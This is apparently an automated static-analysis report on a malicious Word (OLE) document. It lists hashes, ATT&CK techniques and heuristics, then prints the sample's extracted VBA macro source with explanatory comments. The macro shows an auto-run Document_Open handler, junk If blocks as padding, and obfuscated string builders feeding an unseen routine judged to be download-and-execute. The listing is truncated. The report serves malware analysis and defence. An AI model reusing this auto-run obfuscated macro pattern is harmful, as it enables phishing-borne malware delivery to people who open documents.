Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 28176759ce4a7abf…

MALICIOUS

Office (OLE)

86.4 KB First seen: 2019-02-26
MD5: 17dcd9a3b581211b3e13debe5166a558 SHA-1: 0f03e6aa3306353d20149ea939ac918ef735e339 SHA-256: 28176759ce4a7abfa3ae60780051bc81aa0dd476e162cffe844b6d4fd2d28b3b
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing a Document_Open VBA macro, which is a common technique for executing malicious code upon opening. The VBA code is heavily obfuscated and truncated, making it difficult to determine its exact function, but it appears to be designed to download and execute a second-stage payload. The presence of the Document_Open macro and the obfuscated VBA code strongly suggests a malicious intent, likely related to phishing or malware delivery.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 88,448 bytes but its declared streams total only 36,250 bytes — 52,198 bytes (59%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard OOXML DrawingML XML-namespace identifier that is routinely present in Office documents, not evidence of a contacted endpoint

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11401 bytes
SHA-256: 7cf83ed6db5ff80a5e3690679d8f8192d599bf66d1d1ae6e826ba5a50a127716
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "AzAbPzzdcRLDNV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as emitted by olevba's extraction. VB_Name is the module's
' random-looking name; VB_Base = "1Normal.ThisDocument" together with
' VB_PredeclaredId = True looks like an exported ThisDocument document module,
' which is consistent with the Document_Open handler defined below being the
' document's own auto-run event procedure (inferred from the attributes; not
' confirmed from the OLE stream layout in this excerpt).
' Auto-run entry point: Word raises Document_Open when the document is opened,
' so everything below executes without further user interaction (this is the
' procedure behind the report's OLE_VBA_DOCOPEN finding).
'
' Structure as visible in this excerpt:
'   * Nine If ... End If blocks with empty bodies. Each compares or bit-tests
'     names (XUjVz, zANPT, QNQZZi, ...) that are never declared or assigned
'     anywhere in the visible listing; no Option Explicit is present, so they
'     are implicit Variants. With empty bodies the comparison result has no
'     effect either way -- the pattern reads as padding meant to bulk out and
'     obfuscate the code rather than as logic.
'   * One effective statement (the RDuTVEwthQdfDF call) between the padding.
Private Sub Document_Open()
   If XUjVz > zANPT Then


End If
   If QNQZZi And 10 Then


End If
   If EARCb <= VUctt Then


End If
   If QXaMY <= vzkVNI Then


End If
   If jGbUpR <> 9 Then


End If
' The only statement in this procedure that does anything. It concatenates the
' return values of twelve functions and passes the result to RDuTVEwthQdfDF.
' Four of the twelve (GjAdiVpD, LsIUcvdia, ZzKzariVsRs, XYHZSEMn) are defined
' further down and each returns a concatenation of obfuscated string literals;
' the other eight, and RDuTVEwthQdfDF itself, are outside this truncated
' preview, so what is done with the assembled string cannot be confirmed from
' the excerpt (the report's download-and-execute assessment is an inference).
RDuTVEwthQdfDF (GjAdiVpD + LsIUcvdia + ZzKzariVsRs + XYHZSEMn + ifIBBjnB + QBwYloR + jIEhkO + AEQihZsi + ZAuNiHr + fcCXbVro + wNGCaajO + UpvMzRdO)
   If EvYmu >= OmEXnn Then


End If
   If DMDHzw And uaqOj Then


End If
   If ujSjMM Or IBYqpN Then


End If
   If jwicj <= sVEbz Then


End If
End Sub


Attribute VB_Name = "uOIZYwizLmh"
' Start of a second module (random-looking name). It holds the functions that
' build the string fragments consumed by Document_Open in the first module.
' Returns one fragment of the string that Document_Open hands to RDuTVEwthQdfDF.
' The value is the concatenation of six locals (EJzvnS, RrwwXFiLN, pclDiw,
' iQqZJ, jJhtwprD, HsfiKwO), each assembled from short string literals dense
' with "[" characters. No decoding routine appears in this excerpt, so the
' literals' meaning cannot be determined here. Every If ... End If block in
' the function has an empty body and tests names that are never assigned in
' the visible listing, so none of them influences the result -- they read as
' obfuscation padding around the six assignments and the return line.
Function GjAdiVpD()
If MRpSo And 3 Then


End If
EJzvnS = "`ja ,S,@ [p[b[q [c[f" + ":[V[62[ [p[7[#[ " + "[P[a`[ S[3"
If hzPIW <> aUTZdL Then


End If
   If SwQnF < uFvfDH Then


End If
RrwwXFiLN = "s[ [u[N%[ [/[" + ";[][ o[C[Z [t[c[" + "N[ d[q[W[ " + "[e[W[V[ [>[H[r[ [x"
If iiwAqm Eqv NRhFK Then


End If
   If MSZBBw And 16 Then


End If
   If ACKcc Eqv 19 Then


End If
pclDiw = "%[C[ [u['[4[ K[)[n" + "[ [g [D[ [g[Wo[ [E" + "[+[  [Uh[m[z[!" + "[YO[z[8[d[r[x[*"
If PXKlk <= fKfXEl Then


End If
   If zlbdj <> iGKRs Then


End If
   If vqNKKd And Shzhr Then


End If
iQqZJ = "n[xe[f[([v`" + "[>[4[<[q[Q[H[/" + "[^[?[L&`[X[i" + "[U[z[>[2k[8[" + "NK[>[h[Y[]"
If lulRa = kjWmi Then


End If
   If ViuFC And 4 Then


End If
   If ZBzUW > INtsDR Then


End If
   If SNuHm Eqv 12 Then


End If
' The four-quote literal """" is VBA's escape for a single double-quote character.
jJhtwprD = "[W[^[;%[H[b[ [-,oA" + "o[H[_[3[<[;[8[([>[G`" + "[7[E[?w&['" + """" + "[n" + "['[L[<[!&[^["
If MKpGl Or UGonA Then


End If
HsfiKwO = "{[ B[pv[j['[#[_[b" + "[Q[>p[q[3[a[H[F[#" + "[H[E[*[#[N[b[" + "b[q[z[e[h[Q[v[_[" + "l[^`ss[XO[]k[j"
' Return value: the six fragments in assignment order. Nothing below this line
' changes it.
GjAdiVpD = EJzvnS + RrwwXFiLN + pclDiw + iQqZJ + jJhtwprD + HsfiKwO
   If zmKbk <= kiORMp Then


End If
   If ASLHh <> AFSqZu Then


End If
   If vzPcm And APmZo Then


End If
   If QAwQH Eqv oGNDwK Then


End If
   If WGZiqD > DEABi Then


End If
   If GzQXWj Xor WoObJ Then


End If
End Function
' Second fragment builder called from Document_Open. Returns the concatenation
' of three locals (IihITPtntz, zIDhjbu, XpFwTGQwF) built from "["-dense string
' literals; the encoding is not decodable from this excerpt. The If ... End If
' blocks are empty and test names never assigned in the visible listing, so
' they have no effect on the result (same padding pattern as GjAdiVpD).
Function LsIUcvdia()
If jzLjj >= aqzzW Then


End If
   If hzlmt Or jQDKi Then


End If
' """" is VBA's escape for a single double-quote character inside a literal.
IihITPtntz = "[([a[F[?[A4[8[R[x[4&" + "[g['[;`[:[-[\[w" + "[V[0" + """" + "[n" + """" + "[i[z[![M[A" + "[F[ [)[I[=[)`[$[A[g["
zIDhjbu = "(@[c[a>%[4[c[U[" + "C[y![h[ZB%[c[?O[b[" + "Nk[E[i[t[-[H[f[5['[F"
If dGphc = bjnNH Then


End If
XpFwTGQwF = "[C[4[ [][a[;[f[3" + "[^[J[C[M[l[Q[h" + "[n[ih[4[Pk[e[Z[I[t[" + "BS[U[l[#[:" + "[j[A[z[H[d[+[7"
' Return value: the three fragments in assignment order.
LsIUcvdia = IihITPtntz + zIDhjbu + XpFwTGQwF
   If bMIKH And 2 Then


End If
   If SFnBl Or 1 Then


End If
End Function
' Third fragment builder called from Document_Open. Returns the concatenation
' of three locals (UfsZzTHuzKT, hdBuwwww, sZqwrPLwBw) built from "["-dense
' string literals; no decoder is visible in this excerpt. All If ... End If
' blocks have empty bodies and test names never assigned in the visible
' listing, so they do not affect the result (same padding as the siblings).
Function ZzKzariVsRs()
If ikLKo Or CTHCjK Then


End If
   If ohRmwz Eqv KRuEdB Then


End If
UfsZzTHuzKT = "i[yk[B[^[b_[" + "+[G[;B[A[M[b[![G[<" + "s[x[dC[b[vk[" + "][Lo[>[T['[qu[D[d" + "[x[D[l[9&[#K[4[D["
If QWGiI >= ZATpm Then


End If
   If qEUAwj > WQcrCq Then


End If
hdBuwwww = " [6[A[H[0[" + "_[m[q[3[0[p[![h[" + "=[) [Y[N[1" + "k[<[Z[Q[fK[T[/[ [h["
If izoLDD Xor MEStQR Then


End If
   If MmiHkD >= JANqo Then


End If
sZqwrPLwBw = "N[#g[C[T[^[a[n" + "[I[t[c@[4[\[!z[" + "\[D%)[h[2[e"
' Return value: the three fragments in assignment order; the blocks below it
' are empty and leave it unchanged.
ZzKzariVsRs = UfsZzTHuzKT + hdBuwwww + sZqwrPLwBw
   If NUmvI <= 9 Then


End If
   If rTBdSV <> bJGwA Then


End If
   If XHbss <= uFrAiq Then


End If
   If MTjmD >= IuGMDH Then


End If
End Function
Function XYHZSEMn()
If GUJVp Or 13 Then


End If
   If ZHwjqT <= alZhF Then


End If
   If zJdiQ Eqv 7 Then


End If
   If OnlfLl Eqv ZoDIs Then


End If
LoqNfKzWZlj = "[>AB`[2,[ [" + "^[WS[;[b[j[" + "X[9o[*[a[x[l" + "[{[<[T[c[p[]%[" + "8M[LC$" + """" + "[/4[b["
wFvHPPc = "p[Y[M[u[1[([.b[" + "3[zu[+[m[3[Y[" + "$[<[z[r[([m[C"
If pkvOTS < fKWHOo Then


End If
mZitlSAM = "[i[J[Ukd[H[Y[W[" + "B[F$[:[N![_[A[e[([nS" + "[{[$[>[4[ [Yo[6[m"
XYHZSEMn = LoqNfKzWZlj + wFvHP
... (truncated)